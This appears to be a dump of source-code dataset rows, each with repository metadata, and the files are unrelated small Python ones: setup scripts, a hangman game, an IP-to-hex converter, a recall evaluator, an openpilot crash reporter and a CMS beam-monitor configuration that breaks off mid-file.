| 18.166667 | 48 | 0.590214 | 35 | 327 | 5.4 | 0.857143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.134783 | 0.296636 | 327 | 17 | 49 | 19.235294 | 0.686957 | 0.137615 | 0 | 0 | 1 | 0 | 0.146429 | 0.082143 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.090909 | 0 | 0.363636 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
403251bad5543a2ea9b5b81f85773876a2b6f3ba | 1,458 | py | Python | setup.py | pranithk/gluster-georep-tools | 3c8c7dcf63042613b002385edcead7c1ec079e61 | [
"MIT"
] | null | null | null | setup.py | pranithk/gluster-georep-tools | 3c8c7dcf63042613b002385edcead7c1ec079e61 | [
"MIT"
] | null | null | null | setup.py | pranithk/gluster-georep-tools | 3c8c7dcf63042613b002385edcead7c1ec079e61 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
gluster-georep-tools.setup.py
:copyright: (c) 2016 by Aravinda VK
:license: MIT, see LICENSE for more details.
"""
from setuptools import setup
setup(
name="gluster-georep-tools",
version="0.2",
packages=["gluster_georep_tools",
"gluster_georep_tools.status",
"gluster_georep_tools.setup"],
include_package_data=True,
install_requires=['argparse', 'paramiko', 'glustercli'],
entry_points={
"console_scripts": [
"gluster-georep-setup = gluster_georep_tools.setup.cli:main",
"gluster-georep-status = gluster_georep_tools.status.cli:main",
]
},
platforms="linux",
zip_safe=False,
author="Aravinda VK",
author_email="mail@aravindavk.in",
description="Gluster Geo-replication tools",
license="MIT",
keywords="gluster, tool, geo-replication",
url="https://github.com/aravindavk/gluster-georep-tools",
long_description="""
Gluster Geo-replication Tools
""",
classifiers=[
"Development Status :: 3 - Alpha",
"Topic :: Utilities",
"Environment :: Console",
"License :: OSI Approved :: MIT License",
"Operating System :: POSIX :: Linux",
"Programming Language :: Python",
"Programming Language :: Python :: 2.6",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 2 :: Only"
],
)
| 30.375 | 75 | 0.61454 | 151 | 1,458 | 5.81457 | 0.543046 | 0.148064 | 0.164009 | 0.078588 | 0.084282 | 0 | 0 | 0 | 0 | 0 | 0 | 0.011743 | 0.240741 | 1,458 | 47 | 76 | 31.021277 | 0.781391 | 0.091221 | 0 | 0 | 0 | 0 | 0.559387 | 0.111111 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.026316 | 0 | 0.026316 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
403352816f5874a59e3b9fffa9b383a34c03d749 | 311 | py | Python | imgtoch/__init__.py | hrpzcf/imgtoch | 13b59dd4c6b65b8ee17bbd22ac1133a86d34d5fb | [
"MIT"
] | null | null | null | imgtoch/__init__.py | hrpzcf/imgtoch | 13b59dd4c6b65b8ee17bbd22ac1133a86d34d5fb | [
"MIT"
] | null | null | null | imgtoch/__init__.py | hrpzcf/imgtoch | 13b59dd4c6b65b8ee17bbd22ac1133a86d34d5fb | [
"MIT"
] | null | null | null | # coding: utf-8
from .__utils__ import grayscaleOf, makeImage, sortByGrayscale
NAME = "imgtoch"
VERSIONNUM = 0, 2, 3
VERSION = ".".join(map(str, VERSIONNUM))
AUTHOR = "hrpzcf"
EMAIL = "hrpzcf@foxmail.com"
WEBSITE = "https://gitee.com/hrpzcf/imgtoch"
__all__ = ["grayscaleOf", "makeImage", "sortByGrayscale"]
| 23.923077 | 62 | 0.717042 | 36 | 311 | 5.972222 | 0.777778 | 0.186047 | 0.325581 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.014652 | 0.122187 | 311 | 12 | 63 | 25.916667 | 0.772894 | 0.041801 | 0 | 0 | 0 | 0 | 0.334459 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.125 | 0 | 0.125 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
4035dbde81734e9262f7a5d9f7fcf21b0a2fc083 | 1,006 | py | Python | RLBotPack/JoeyBot/CSharpPythonAgent/CSharpPythonAgent.py | RLMarvin/RLBotPack | c88c4111bf67d324b471ad87ad962e7bc8c2a202 | [
"MIT"
] | 13 | 2019-05-25T20:25:51.000Z | 2022-03-19T13:36:23.000Z | RLBotPack/JoeyBot/CSharpPythonAgent/CSharpPythonAgent.py | RLMarvin/RLBotPack | c88c4111bf67d324b471ad87ad962e7bc8c2a202 | [
"MIT"
] | 53 | 2019-06-07T13:31:59.000Z | 2022-03-28T22:53:47.000Z | RLBotPack/JoeyBot/CSharpPythonAgent/CSharpPythonAgent.py | RLMarvin/RLBotPack | c88c4111bf67d324b471ad87ad962e7bc8c2a202 | [
"MIT"
] | 78 | 2019-06-30T08:42:13.000Z | 2022-03-23T20:11:42.000Z | import os
from rlbot.agents.base_agent import BOT_CONFIG_AGENT_HEADER
from rlbot.agents.base_dotnet_agent import BaseDotNetAgent
from rlbot.parsing.custom_config import ConfigHeader, ConfigObject
class DotNetBot(BaseDotNetAgent):
def get_port_file_path(self):
# Look for a port.cfg file in the same directory as THIS python file.
return os.path.realpath(os.path.join(os.getcwd(), os.path.dirname(__file__), 'port.cfg'))
def load_config(self, config_header: ConfigHeader):
self.dotnet_executable_path = config_header.getpath('dotnet_executable_path')
self.logger.info(".NET executable is configured as {}".format(self.dotnet_executable_path))
@staticmethod
def create_agent_configurations(config: ConfigObject):
params = config.get_header(BOT_CONFIG_AGENT_HEADER)
params.add_value('dotnet_executable_path', str, default=None,
description='Relative path to the executable that runs the .NET executable.')
| 43.73913 | 102 | 0.744533 | 131 | 1,006 | 5.473282 | 0.480916 | 0.089261 | 0.111576 | 0.052999 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.171968 | 1,006 | 22 | 103 | 45.727273 | 0.860744 | 0.0666 | 0 | 0 | 0 | 0 | 0.159018 | 0.046958 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0.266667 | 0.066667 | 0.6 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
4036ce0b3a0763152669516459e91450d4954edb | 2,640 | py | Python | v3_experiments.py | runekaagaard/workflows | 7bb7fe3821bc33b5e82c65dda3ca61f69ee8bcfa | [
"Unlicense"
] | null | null | null | v3_experiments.py | runekaagaard/workflows | 7bb7fe3821bc33b5e82c65dda3ca61f69ee8bcfa | [
"Unlicense"
] | null | null | null | v3_experiments.py | runekaagaard/workflows | 7bb7fe3821bc33b5e82c65dda3ca61f69ee8bcfa | [
"Unlicense"
] | null | null | null | # coding=utf-8
import inspect
from functools import wraps
def listify(func_s):
if callable(func_s):
return [func_s]
else:
return func_s
def parse_conditions(condition_s, args, kwargs, title):
    err_msg = str(title) + " nr. {} failed: {}"
    for i, condition in enumerate(listify(condition_s), 1):
        assert condition(*args, **kwargs) is not False, err_msg.format(
            i, inspect.getsource(condition))
def mark_takes_no_arguments(func):
func.takes_no_arguments = True
return func
def takes_no_arguments(func):
mark_takes_no_arguments(func)
return func
def contract(pre_conditions, post_conditions):
"""
Pre is before. Post is after.
"""
def _(func):
@wraps(func)
def __(*args, **kwargs):
parse_conditions(
pre_conditions, args, kwargs, title='Preconditions')
result = func(*args, **kwargs)
parse_conditions(
post_conditions, [result], {}, title='Postconditions')
return result
return __
return _
def processing(pre_process, post_process):
"Procemanns"
def _(func):
@wraps(func)
def __(*args, **kwargs):
args, kwargs = pre_process(*args, **kwargs)
return post_process(func(*args, **kwargs))
return __
return _
@takes_no_arguments
def add_one(func):
@wraps(func)
def _(*args, **kwargs):
return func(*args, **kwargs) + 1
return _
def compose(*workflows):
def extract_kwargs(workflow, kwargs):
return {x: kwargs[x] for x in inspect.getargspec(workflow).args}
def _(*args, **kwargs):
assert len(args) == 0, "Only keywords allowed."
def __(func):
@wraps(func)
def ___(*a, **k):
return func(*a, **k)
for workflow in reversed(workflows):
if hasattr(workflow, 'takes_no_arguments'):
___ = workflow(___)
else:
___ = workflow(**extract_kwargs(workflow, kwargs))(___)
                ___.__doc__ = (___.__doc__ or "") + (workflow.__doc__ or "")
return ___
return __
return _
someworkflow = compose(contract, processing, add_one)
print(someworkflow)
@someworkflow(
pre_conditions=[lambda x: x == 2],
post_conditions=lambda r: r == 15,
pre_process=lambda x: ([x + 1], {}),
post_process=lambda x: x + 1, )
def somefunc(x):
"""
Very important: x must be 2!
"""
return x + 10
print(somefunc(2))
help(somefunc)
| 22.372881 | 75 | 0.576894 | 292 | 2,640 | 4.907534 | 0.297945 | 0.08374 | 0.066992 | 0.044662 | 0.127704 | 0.058618 | 0.040475 | 0 | 0 | 0 | 0 | 0.007115 | 0.307955 | 2,640 | 117 | 76 | 22.564103 | 0.77723 | 0.004545 | 0 | 0.306667 | 0 | 0 | 0.037446 | 0 | 0 | 0 | 0 | 0 | 0.026667 | 0 | null | null | 0 | 0.026667 | null | null | 0.026667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
403ac1f41e289fbd9825b8c92a8b0c154ef6090e | 1,300 | py | Python | trabalhoaqui/comp_perguntas/valida.py | EmanoelG/jogodaforca | 06baf78b31e4b40d8db9fc5be67700be32c66cba | [
"MIT"
] | 1 | 2020-06-06T17:09:55.000Z | 2020-06-06T17:09:55.000Z | trabalhoaqui/comp_perguntas/valida.py | EmanoelG/jogodaforca | 06baf78b31e4b40d8db9fc5be67700be32c66cba | [
"MIT"
] | null | null | null | trabalhoaqui/comp_perguntas/valida.py | EmanoelG/jogodaforca | 06baf78b31e4b40d8db9fc5be67700be32c66cba | [
"MIT"
] | null | null | null | from jogo import desenha_jogo
from random import randint
import sys
def input_cria_usuario():
usuario = dict()
usuario['nome'] = input('Informe o seu nome: ')
usuario['pontos'] = 0
usuario['desafiado'] = False
return usuario
def comeco(j1, j2):
    j1 = 1
    j2 = 2
    n = randint(j1, j2)
    escolhildo = n
    return escolhildo
# changed this here
def completou(acertos, pala, jogador_adivinhao):  # receives the count of correct letters, then checks whether the word is complete
    if acertos == len(pala):  # and here
        print(f'\t\t\t\t\t \033[37mJogador >> {jogador_adivinhao} << venceu !\033[m')
print("""
\033[35m
_____ ___ ___ ___ _______
/ ___| / | / |/ | | ____|
| | / | / /| /| | | |__
| | _ / /| | / / |__/ | | | __|
| |_| | / ___ | / / | | | |____
\_____//_/ |_| /_/ |_| |_______|
_____ _ _ ______ ______
/ _ \ | | / / | _____| | _ |
| | | | | | / / | |__ | |_| |
| | | | | | / / | __| | _ /
| |_| | | |/ / | |____ | | \ |
\_____/ |___/ |______| |_| \_|\033[m
""")
| 23.214286 | 127 | 0.412308 | 94 | 1,300 | 4.457447 | 0.606383 | 0.019093 | 0.02148 | 0.019093 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.03383 | 0.431538 | 1,300 | 55 | 128 | 23.636364 | 0.533153 | 0.073077 | 0 | 0 | 0 | 0.030303 | 0.60401 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0 | 0.090909 | 0 | 0.242424 | 0.060606 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
403c902e2dd03cc231fcbd2349b64917b93e7dde | 826 | py | Python | scripts/ip2hex.py | Kidlike/dotfiles | b9c4daa4da1f416662b708338a497b5a620ddcbf | [
"Apache-2.0"
] | null | null | null | scripts/ip2hex.py | Kidlike/dotfiles | b9c4daa4da1f416662b708338a497b5a620ddcbf | [
"Apache-2.0"
] | null | null | null | scripts/ip2hex.py | Kidlike/dotfiles | b9c4daa4da1f416662b708338a497b5a620ddcbf | [
"Apache-2.0"
] | 1 | 2018-05-28T08:08:25.000Z | 2018-05-28T08:08:25.000Z | #!/usr/bin/python
import sys
import re
def iptohex(ip):
octets = ip.split('.')
hex_octets = []
for octet in octets:
if int(octet) < 16:
hex_octets.append('0' + hex(int(octet))[2:])
else:
hex_octets.append(hex(int(octet))[2:])
hex_octets = ''.join(hex_octets)
return hex_octets
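# e.g. iptohex("10.0.0.16") returns "0a000010"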
def main():
    if len(sys.argv) != 2:
        print('Usage: ./iptohex.py x.x.x.x')
        sys.exit(1)
    ip = sys.argv[1]
    invalidInput = re.search(r'[^0-9\.]', ip)
    if invalidInput:
        print('Usage: ./iptohex.py x.x.x.x')
        sys.exit(1)
    hex_ip = iptohex(ip)
    print("Hex IP: %s " % (hex_ip))
    print("Decimal IP: %s" % (ip))
if __name__ == '__main__':
main()
| 26.645161 | 68 | 0.468523 | 105 | 826 | 3.533333 | 0.380952 | 0.145553 | 0.032345 | 0.06469 | 0.123989 | 0.123989 | 0.123989 | 0.123989 | 0 | 0 | 0 | 0.019455 | 0.377724 | 826 | 30 | 69 | 27.533333 | 0.702335 | 0.01937 | 0 | 0.08 | 0 | 0 | 0.119901 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.08 | null | null | 0.16 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
403cacc3c31596cf185f47bf3504df89608d6f14 | 1,329 | py | Python | src/models/CVX_weighted.py | DanqingZ/social-DCM | 3c2541a7ed0e7f4519d97783b5b673fa6c06ae94 | [
"MIT"
] | 14 | 2017-08-10T17:00:20.000Z | 2021-12-23T09:00:50.000Z | src/models/CVX_weighted.py | DanqingZ/social-DCM | 3c2541a7ed0e7f4519d97783b5b673fa6c06ae94 | [
"MIT"
] | null | null | null | src/models/CVX_weighted.py | DanqingZ/social-DCM | 3c2541a7ed0e7f4519d97783b5b673fa6c06ae94 | [
"MIT"
] | 1 | 2019-08-13T08:47:43.000Z | 2019-08-13T08:47:43.000Z | import random
import numpy as np
import numpy.linalg as LA
import scipy as spy
import time
from itertools import *
import sys
import cvxpy as cvx
from random import randint
from scipy.sparse import csc_matrix
from scipy import sparse as sp
import networkx as nx
class CVX_weighted:
def __init__(self, X, y, b,pos_node ,temp, Lambda, Rho):
self.X = X
self.y = y
self.value = 0
self.dim = X.shape[1]
self.Lambda = Lambda
self.Rho = Rho
self.temp = temp
self.num_nodes = nx.number_of_nodes(self.temp)
self.W = np.zeros((self.dim))
self.b = b
self.pos_node = pos_node
self.P = np.zeros((self.num_nodes,self.num_nodes))
def init_P(self):
for i in self.temp.nodes_iter():
for j in self.temp.neighbors(i):
self.P[i,j] = self.temp[i][j]['pos_edge_prob']
self.P = np.diag(np.sum(self.P,1)) - self.P
def solve(self):
dim = self.X.shape[1]
w = cvx.Variable(dim)
num_nodes = nx.number_of_nodes(self.temp)
b = cvx.Variable(num_nodes)
loss = cvx.sum_entries(cvx.mul_elemwise(np.array(self.pos_node),cvx.logistic(-cvx.mul_elemwise(self.y, self.X*w+b)))) + self.Lambda*cvx.quad_form(b,self.P)
problem = cvx.Problem(cvx.Minimize(loss))
problem.solve(verbose=False)
opt = problem.value
self.W = w.value
self.b = b.value
self.value = opt | 26.58 | 157 | 0.699774 | 242 | 1,329 | 3.731405 | 0.297521 | 0.053156 | 0.039867 | 0.033223 | 0.115172 | 0.06866 | 0.06866 | 0.06866 | 0 | 0 | 0 | 0.00363 | 0.170805 | 1,329 | 50 | 158 | 26.58 | 0.815789 | 0 | 0 | 0.088889 | 0 | 0 | 0.009774 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.066667 | false | 0 | 0.311111 | 0 | 0.4 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
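# Minimal usage sketch (hypothetical data; temp is a networkx graph whose edges
# carry a 'pos_edge_prob' attribute, as init_P assumes):
#   model = CVX_weighted(X, y, b, pos_node, G, Lambda=1.0, Rho=0.1)
#   model.init_P()
#   model.solve()
#   print(model.W, model.b, model.value)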
404a73f48e1b3ca8bb85958c0c604a1931f4d34f | 1,450 | py | Python | jina/executors/evaluators/rank/recall.py | sdsd0101/jina | 1a835d9015c627a2cbcdc58ee3d127962ada1bc9 | [
"Apache-2.0"
] | 2 | 2020-10-19T17:06:19.000Z | 2020-10-22T14:10:55.000Z | jina/executors/evaluators/rank/recall.py | ayansiddiqui007/jina | 2a764410de47cc11e53c8f652ea1095d5dab5435 | [
"Apache-2.0"
] | null | null | null | jina/executors/evaluators/rank/recall.py | ayansiddiqui007/jina | 2a764410de47cc11e53c8f652ea1095d5dab5435 | [
"Apache-2.0"
] | null | null | null | from typing import Sequence, Any
from jina.executors.evaluators.rank import BaseRankingEvaluator
from jina.executors.evaluators.decorators import as_aggregator
class RecallEvaluator(BaseRankingEvaluator):
"""A :class:`RecallEvaluator` evaluates the Precision of the search.
It computes how many of the first given `eval_at` groundtruth are found in the matches
"""
def __init__(self, eval_at: int, *args, **kwargs):
""""
:param eval_at: k at which evaluation is performed
"""
super().__init__(*args, **kwargs)
self.eval_at = eval_at
@property
def complete_name(self):
return f'Recall@{self.eval_at}'
@as_aggregator
def evaluate(self, matches_ids: Sequence[Any], groundtruth_ids: Sequence[Any], *args, **kwargs) -> float:
""""
:param matches_ids: the matched document identifiers from the request as matched by jina indexers and rankers
:param groundtruth_ids: the expected documents matches ids sorted as they are expected
:return the evaluation metric value for the request document
"""
ret = 0.0
for doc_id in groundtruth_ids[:self.eval_at]:
if doc_id in matches_ids:
ret += 1.0
divisor = min(self.eval_at, len(matches_ids))
if divisor == 0.0:
"""TODO: Agree on a behavior"""
return 0.0
else:
return ret / divisor
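        # Worked example (hypothetical ids): eval_at=2,
        # groundtruth_ids=[1, 5, 3], matches_ids=[5, 7, 1]
        # -> both of groundtruth_ids[:2] are matched, divisor = min(2, 3) = 2, recall = 1.0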
| 35.365854 | 117 | 0.648966 | 185 | 1,450 | 4.935135 | 0.459459 | 0.052574 | 0.054765 | 0.059146 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007498 | 0.264138 | 1,450 | 40 | 118 | 36.25 | 0.848172 | 0.32069 | 0 | 0 | 0 | 0 | 0.023973 | 0.023973 | 0 | 0 | 0 | 0.025 | 0 | 1 | 0.142857 | false | 0 | 0.142857 | 0.047619 | 0.47619 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
404be03a1fd1048c68239ebc361551f5a1526980 | 270 | py | Python | tests/schema_mapping/structures/example5.py | danny-vayu/typedpy | e97735a742acbd5f1133e23f08cf43836476686a | [
"MIT"
] | null | null | null | tests/schema_mapping/structures/example5.py | danny-vayu/typedpy | e97735a742acbd5f1133e23f08cf43836476686a | [
"MIT"
] | null | null | null | tests/schema_mapping/structures/example5.py | danny-vayu/typedpy | e97735a742acbd5f1133e23f08cf43836476686a | [
"MIT"
] | null | null | null | from typedpy import Array, DoNotSerialize, Structure, mappers
class Foo(Structure):
i: int
s: str
_serialization_mapper = {"i": "j", "s": "name"}
class Example5(Foo):
a: Array
_serialization_mapper = [{"j": DoNotSerialize}, mappers.TO_LOWERCASE] | 20.769231 | 73 | 0.674074 | 32 | 270 | 5.53125 | 0.65625 | 0.214689 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004587 | 0.192593 | 270 | 13 | 73 | 20.769231 | 0.807339 | 0 | 0 | 0 | 0 | 0 | 0.02952 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.125 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
4050f12cd3fda3e62426b196e960faffe455d7f7 | 938 | py | Python | selfdrive/crash.py | darknight111/openpilot3 | a0c755fbe1889f26404a8225816f57e89fde7bc2 | [
"MIT"
] | 19 | 2020-08-05T12:11:58.000Z | 2022-03-07T01:18:56.000Z | selfdrive/crash.py | darknight111/openpilot3 | a0c755fbe1889f26404a8225816f57e89fde7bc2 | [
"MIT"
] | 18 | 2020-08-20T05:17:38.000Z | 2021-12-06T09:02:00.000Z | selfdrive/crash.py | darknight111/openpilot3 | a0c755fbe1889f26404a8225816f57e89fde7bc2 | [
"MIT"
] | 25 | 2020-08-30T09:10:14.000Z | 2022-02-20T02:31:13.000Z | """Install exception handler for process crash."""
from selfdrive.swaglog import cloudlog
from selfdrive.version import version
import sentry_sdk
from sentry_sdk.integrations.threading import ThreadingIntegration
def capture_exception(*args, **kwargs) -> None:
cloudlog.error("crash", exc_info=kwargs.get('exc_info', 1))
try:
sentry_sdk.capture_exception(*args, **kwargs)
sentry_sdk.flush() # https://github.com/getsentry/sentry-python/issues/291
except Exception:
cloudlog.exception("sentry exception")
def bind_user(**kwargs) -> None:
sentry_sdk.set_user(kwargs)
def bind_extra(**kwargs) -> None:
for k, v in kwargs.items():
sentry_sdk.set_tag(k, v)
def init() -> None:
sentry_sdk.init("https://4c138e01b37142ac8a0b73f7a4f349eb@o346458.ingest.sentry.io/5861866",
default_integrations=False, integrations=[ThreadingIntegration(propagate_hub=True)],
release=version)
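# Typical wiring (a sketch, not from this file's call sites): call init() once at
# process start, then report errors from an except block:
#   try:
#       run()
#   except Exception:
#       capture_exception()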
| 33.5 | 102 | 0.735608 | 116 | 938 | 5.801724 | 0.5 | 0.093611 | 0.059435 | 0.077266 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.045963 | 0.141791 | 938 | 27 | 103 | 34.740741 | 0.790062 | 0.105544 | 0 | 0 | 0 | 0 | 0.122449 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | true | 0 | 0.2 | 0 | 0.4 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
405b957bd7045b5d856865ed3de04736c0fcea38 | 10,857 | py | Python | DQM/BeamMonitor/test/44X_beam_dqm_sourceclient-live_cfg.py | nistefan/cmssw | ea13af97f7f2117a4f590a5e654e06ecd9825a5b | [
"Apache-2.0"
] | null | null | null | DQM/BeamMonitor/test/44X_beam_dqm_sourceclient-live_cfg.py | nistefan/cmssw | ea13af97f7f2117a4f590a5e654e06ecd9825a5b | [
"Apache-2.0"
] | null | null | null | DQM/BeamMonitor/test/44X_beam_dqm_sourceclient-live_cfg.py | nistefan/cmssw | ea13af97f7f2117a4f590a5e654e06ecd9825a5b | [
"Apache-2.0"
] | null | null | null | import FWCore.ParameterSet.Config as cms
process = cms.Process("BeamMonitor")
#----------------------------
# Common part for PP and H.I Running
#-----------------------------
process.load("DQM.Integration.test.inputsource_cfi")
#--------------------------
# HLT Filter
process.load("HLTrigger.special.HLTTriggerTypeFilter_cfi")
# 0=random, 1=physics, 2=calibration, 3=technical
process.hltTriggerTypeFilter.SelectedTriggerType = 1
#----------------------------
# DQM Live Environment
#-----------------------------
process.load("DQM.Integration.test.environment_cfi")
process.dqmEnv.subSystemFolder = 'BeamMonitor'
import DQMServices.Components.DQMEnvironment_cfi
process.dqmEnvPixelLess = DQMServices.Components.DQMEnvironment_cfi.dqmEnv.clone()
process.dqmEnvPixelLess.subSystemFolder = 'BeamMonitor_PixelLess'
#----------------------------
# BeamMonitor
#-----------------------------
process.load("DQM.BeamMonitor.BeamMonitor_cff")
process.load("DQM.BeamMonitor.BeamMonitorBx_cff")
process.load("DQM.BeamMonitor.BeamMonitor_PixelLess_cff")
process.load("DQM.BeamMonitor.BeamConditionsMonitor_cff")
#### SETUP TRACKING RECONSTRUCTION ####
process.load("Configuration.StandardSequences.GeometryRecoDB_cff")
process.load('Configuration.StandardSequences.MagneticField_AutoFromDBCurrent_cff')
process.load("DQM.Integration.test.FrontierCondition_GT_cfi")
process.load("Configuration.StandardSequences.RawToDigi_Data_cff")
# Change Beam Monitor variables
if process.dqmSaver.producer.value() is "Playback":
process.dqmBeamMonitor.BeamFitter.WriteAscii = False
process.dqmBeamMonitor.BeamFitter.AsciiFileName = '/nfshome0/yumiceva/BeamMonitorDQM/BeamFitResults.txt'
process.dqmBeamMonitor.BeamFitter.WriteDIPAscii = True
process.dqmBeamMonitor.BeamFitter.DIPFileName = '/nfshome0/dqmdev/BeamMonitorDQM/BeamFitResults.txt'
else:
process.dqmBeamMonitor.BeamFitter.WriteAscii = True
process.dqmBeamMonitor.BeamFitter.AsciiFileName = '/nfshome0/yumiceva/BeamMonitorDQM/BeamFitResults.txt'
process.dqmBeamMonitor.BeamFitter.WriteDIPAscii = True
process.dqmBeamMonitor.BeamFitter.DIPFileName = '/nfshome0/dqmpro/BeamMonitorDQM/BeamFitResults.txt'
#process.dqmBeamMonitor.BeamFitter.SaveFitResults = False
#process.dqmBeamMonitor.BeamFitter.OutputFileName = '/nfshome0/yumiceva/BeamMonitorDQM/BeamFitResults.root'
process.dqmBeamMonitorBx.BeamFitter.WriteAscii = True
process.dqmBeamMonitorBx.BeamFitter.AsciiFileName = '/nfshome0/yumiceva/BeamMonitorDQM/BeamFitResults_Bx.txt'
## TKStatus
process.dqmTKStatus = cms.EDAnalyzer("TKStatus",
BeamFitter = cms.PSet(
DIPFileName = process.dqmBeamMonitor.BeamFitter.DIPFileName
)
)
process.dqmcommon = cms.Sequence(process.dqmEnv
*process.dqmSaver)
process.monitor = cms.Sequence(process.dqmBeamMonitor)
#--------------------------
# Proton-Proton Stuff
#--------------------------
if (process.runType.getRunType() == process.runType.pp_run or process.runType.getRunType() == process.runType.cosmic_run):
print "Running pp"
process.EventStreamHttpReader.SelectEvents = cms.untracked.PSet(
SelectEvents = cms.vstring('HLT_L1*',
'HLT_Jet*',
'HLT_*Cosmic*',
'HLT_HT*',
'HLT_MinBias_*',
'HLT_Physics*',
'HLT_ZeroBias_v*')
)
process.load("Configuration.StandardSequences.Reconstruction_cff")
process.load("RecoTracker.IterativeTracking.iterativeTk_cff")
## Pixelless Tracking
process.load('RecoTracker/Configuration/RecoTrackerNotStandard_cff')
process.MeasurementTracker.pixelClusterProducer = cms.string("")
# Offline Beam Spot
process.load("RecoVertex.BeamSpotProducer.BeamSpot_cff")
## Offline PrimaryVertices
import RecoVertex.PrimaryVertexProducer.OfflinePrimaryVertices_cfi
process.offlinePrimaryVertices = RecoVertex.PrimaryVertexProducer.OfflinePrimaryVertices_cfi.offlinePrimaryVertices.clone()
process.dqmBeamMonitor.OnlineMode = True
process.dqmBeamMonitor.resetEveryNLumi = 5
process.dqmBeamMonitor.resetPVEveryNLumi = 5
process.dqmBeamMonitor.PVFitter.minNrVerticesForFit = 25
process.dqmBeamMonitor.BeamFitter.TrackCollection = cms.untracked.InputTag('generalTracks')
process.offlinePrimaryVertices.TrackLabel = cms.InputTag("generalTracks")
process.offlinePrimaryVertices.label=cms.string("")
process.offlinePrimaryVertices.minNdof=cms.double(0.0)
process.offlinePrimaryVertices.useBeamConstraint=cms.bool(False)
#TriggerName for selecting pv for DIP publication, NO wildcard needed here
#it will pick all triggers which has these strings in theri name
process.dqmBeamMonitor.jetTrigger = cms.untracked.vstring("HLT_ZeroBias_v",
"HLT_Jet300_v",
"HLT_QuadJet70_v")
process.dqmBeamMonitor.hltResults = cms.InputTag("TriggerResults","","HLT")
#fast general track reco
    process.iterTracking = cms.Sequence(process.InitialStep
*process.LowPtTripletStep
*process.PixelPairStep
